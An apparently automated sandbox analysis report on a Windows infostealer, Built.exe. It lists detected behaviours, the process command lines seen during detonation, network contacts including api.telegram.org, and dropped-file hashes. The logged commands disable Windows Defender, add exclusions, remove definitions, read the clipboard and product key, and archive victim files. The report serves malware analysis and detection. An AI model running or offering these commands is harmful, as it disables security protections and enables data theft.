Analysis Overview
SHA256
8f41839c2a8a80984e95a7d8dd037f777aeebc72fc134ce4eb487b909f501603
Threat Level: Known bad
The file Built.exe was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Command and Scripting Interpreter: PowerShell
Clipboard Data
Unsecured Credentials: Credentials In Files
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Obfuscated Files or Information: Command Obfuscation
UPX packed file
Enumerates processes with tasklist
Browser Information Discovery
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Gathers system information
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Detects videocard installed
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-12 14:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-12 14:33
Reported
2024-11-12 14:33
Platform
win10ltsc2021-20241023-en
Max time kernel
32s
Max time network
36s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI46562\rar.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Browser Information Discovery
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [encoded command elided]"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [encoded command elided]
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r4n4ah4w\r4n4ah4w.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9A5B.tmp" "c:\Users\Admin\AppData\Local\Temp\r4n4ah4w\CSC60B37459BC424B6A9FFB77B615D4B59.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI46562\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\HZMGF.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI46562\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI46562\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\HZMGF.zip" *
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.204.67:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 172.165.69.228:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| FR | 20.199.58.43:443 | fd.api.iris.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI46562\python311.dll
C:\Users\Admin\AppData\Local\Temp\_MEI46562\VCRUNTIME140.dll
C:\Users\Admin\AppData\Local\Temp\_MEI46562\base_library.zip
C:\Users\Admin\AppData\Local\Temp\_MEI46562\_ctypes.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI46562\libffi-8.dll
C:\Users\Admin\AppData\Local\Temp\_MEI46562\_ssl.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI46562\_sqlite3.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI46562\_socket.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI46562\_queue.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI46562\_lzma.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI46562\_hashlib.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI46562\_decimal.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI46562\_bz2.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI46562\unicodedata.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI46562\sqlite3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI46562\skoch.aes
C:\Users\Admin\AppData\Local\Temp\_MEI46562\select.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI46562\rarreg.key
C:\Users\Admin\AppData\Local\Temp\_MEI46562\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI46562\libssl-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI46562\libcrypto-1_1.dll
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yjrn00al.wge.ps1
\??\c:\Users\Admin\AppData\Local\Temp\r4n4ah4w\r4n4ah4w.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\r4n4ah4w\r4n4ah4w.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\r4n4ah4w\CSC60B37459BC424B6A9FFB77B615D4B59.TMP
C:\Users\Admin\AppData\Local\Temp\RES9A5B.tmp
C:\Users\Admin\AppData\Local\Temp\r4n4ah4w\r4n4ah4w.dll
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\ConvertBackup.xml
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\SaveSelect.mp3
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\MoveSubmit.mp4
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\BackupRequest.vssx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\LockConfirm.jpeg
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\EditDeny.xlsx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\BlockConvert.txt
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\ConvertApprove.xlsx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\LimitOut.xlsx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\JoinMerge.xlsx
| MD5 | 30f3a51605b7e58d0286bccaa5c49e8c |
| SHA1 | 7a14de5ebaf4cf1efdecd1196ef3e279ad5ea13e |
| SHA256 | 93aa25d6c824f760165ec016fc4ad9652533ecf593e2c97c14904b9884fc60f6 |
| SHA512 | 14c9f6c0af66000ef3dfc8cbddeb79c0b7023d68f7c2aa402bf6496f135222fade81cdb5d45e55b68a074fba3ee283d43f694c95b74aa8dacb494f397444ba73 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\MountEnter.doc
| MD5 | b8ec7696a3d74236adb67eb623a8833c |
| SHA1 | 63c4b743a0214211d3fadd832696203ad5acb880 |
| SHA256 | b06a20f6243375a815b8d3ca29b08cec1bd8a05445659a35566907905eba6725 |
| SHA512 | c181c225fb07e694aff2dfa468a52ca8cd612412bcfd04b54e60540e82df5f73a9e9f567e329343fbeec33ff9383e9ff2209df461192bfbe7023d1efbb0b23da |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\OptimizeFormat.xlsx
| MD5 | cfcb4273fb23d35ebb7ebf42e0c43371 |
| SHA1 | 9cba00e68ba663c25d108733d7e5b73e9357cfd5 |
| SHA256 | 69ab48455f83a178f11e795b49a2656f65ad496ed79f08c6a4a266be4af12270 |
| SHA512 | a9cc9dbd24608f519c84f2f1772ba436b331d7bdc41ff14f8fbfba07337643de98831fac60cf48bae6b06e8737ef9dde06770615f232123a45534f8c1670e114 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\RemoveCompress.xls
| MD5 | 6e74645ebd086189135882445ced6e2a |
| SHA1 | 8765922f5f9197931f5be7dfd865ef0182e4a8b6 |
| SHA256 | 8384ccde1dc4b9a08b6fd5db4885f1d18ab4ee687511ae248ef4d7becb273e22 |
| SHA512 | c4a33adb181213140a445e4420948dd6689a19d80fa3828abc37ba4a66c0005862140d1de28971b4c983748dd84cfcc9ab467010963304caf2ee949ae9b69952 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\BackupDebug.rar
| MD5 | d6b9b9da8e1984bbda1b7a6b353fa07c |
| SHA1 | 093be76f17d291ce7b447afdf68b29d5484b23ab |
| SHA256 | a947fe1f08758dcfdc37d9906bd0dddd08905e9667f5223cff39daf2d79d05f4 |
| SHA512 | e72a7dc3faf0cab069ad9e664aed96b30414c15fffc23f9dc6b2b7625787e2065a2e660fbccb40bc62dda29539ec50a1d67bc4a0dd7e856a55445004e7453b59 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\RepairSync.jpeg
| MD5 | 5caef57615a510224450c54f7135d536 |
| SHA1 | a0b61fb042b2cb8a85ce0b4ef7608680b6496096 |
| SHA256 | 6131bfc4f1b2a810a6e602bc27cca90f6a3ce888262e2282702ca3859b788d73 |
| SHA512 | 2c66894fa7d418e569813e70d22c5f3593701c356676beac33d13180e2ec61a12f2d48692609fd1445ff2eab21efbd5e43049063d6a1b2af6fd22feb381c7b9f |
memory/1704-271-0x000001FE90620000-0x000001FE90621000-memory.dmp
memory/1704-270-0x000001FE90620000-0x000001FE90621000-memory.dmp
memory/1704-269-0x000001FE90620000-0x000001FE90621000-memory.dmp
memory/1704-281-0x000001FE90620000-0x000001FE90621000-memory.dmp
memory/1704-280-0x000001FE90620000-0x000001FE90621000-memory.dmp
memory/1704-279-0x000001FE90620000-0x000001FE90621000-memory.dmp
memory/1704-278-0x000001FE90620000-0x000001FE90621000-memory.dmp
memory/1704-277-0x000001FE90620000-0x000001FE90621000-memory.dmp
memory/1704-276-0x000001FE90620000-0x000001FE90621000-memory.dmp
memory/1704-275-0x000001FE90620000-0x000001FE90621000-memory.dmp
memory/4696-302-0x00007FF98BDB0000-0x00007FF98C398000-memory.dmp
memory/4696-317-0x00007FF98BDB0000-0x00007FF98C398000-memory.dmp
memory/4696-341-0x00007FF99ACD0000-0x00007FF99ACFE000-memory.dmp
memory/4696-340-0x00007FF99BB10000-0x00007FF99BB1D000-memory.dmp
memory/4696-339-0x00007FF99ADD0000-0x00007FF99ADE9000-memory.dmp
memory/4696-338-0x00007FF98AB70000-0x00007FF98ACE3000-memory.dmp
memory/4696-337-0x00007FF99AD30000-0x00007FF99AD53000-memory.dmp
memory/4696-336-0x00007FF99B590000-0x00007FF99B5A9000-memory.dmp
memory/4696-335-0x00007FF99ADF0000-0x00007FF99AE1D000-memory.dmp
memory/4696-334-0x00007FF9A4A30000-0x00007FF9A4A3F000-memory.dmp
memory/4696-333-0x00007FF99BA00000-0x00007FF99BA24000-memory.dmp
memory/4696-332-0x00007FF98A8E0000-0x00007FF98A998000-memory.dmp
memory/4696-331-0x00007FF989E20000-0x00007FF989F3C000-memory.dmp
memory/4696-330-0x00007FF99B800000-0x00007FF99B80D000-memory.dmp
memory/4696-329-0x00007FF99ACB0000-0x00007FF99ACC4000-memory.dmp
memory/4696-328-0x00007FF98A560000-0x00007FF98A8D5000-memory.dmp